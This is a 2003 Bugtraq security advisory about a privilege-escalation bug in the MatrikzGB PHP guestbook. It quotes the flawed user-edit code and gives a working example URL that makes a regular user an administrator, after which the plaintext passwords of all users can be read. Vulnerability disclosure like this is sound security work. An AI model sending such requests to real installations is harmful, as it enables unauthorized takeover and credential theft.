[31244] in bugtraq
Security hole in MatrikzGB
daemon@ATHENA.MIT.EDU (Stephan S.)
Mon Aug 18 12:16:47 2003
Date: 16 Aug 2003 01:51:49 -0000
Message-ID: <20030816015149.6998.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: "Stephan S." <mastamorphixx@web.de>
To: bugtraq@securityfocus.com
Security hole in MatrikzGB Guestbook
15/8/2003
Vulnerable Versions:
Version 2.0 and prior
Version 3 (not tested)
Summary:
MatrikzGB was written by Thomas Hempel for
www.onsite.org.
A bug in index.php allows a user with a regular user
account to give administrator rights to himself.
Details:
The bug is in the user edit function:
Every regular user is allowed to chanche rights or do any
modifications on existing users.
if ($new_username != "" && $new_password != "") {
create_user($new_username,$new_password,$new_rights,$entry_index);
echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!";
Example:
This is a example how to give administrator rights to
yourself.
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
Comment:
When you got administrator rights,you can look up the
passwords of all other users,they are in plaintext.
Vendor status:
Vendor has been contacted.
by Stephan "mastamorphixx" S. ,member of
www.lostkey.org
contact:mastamorphixx@web.de
irc.euirc.de #lostkey
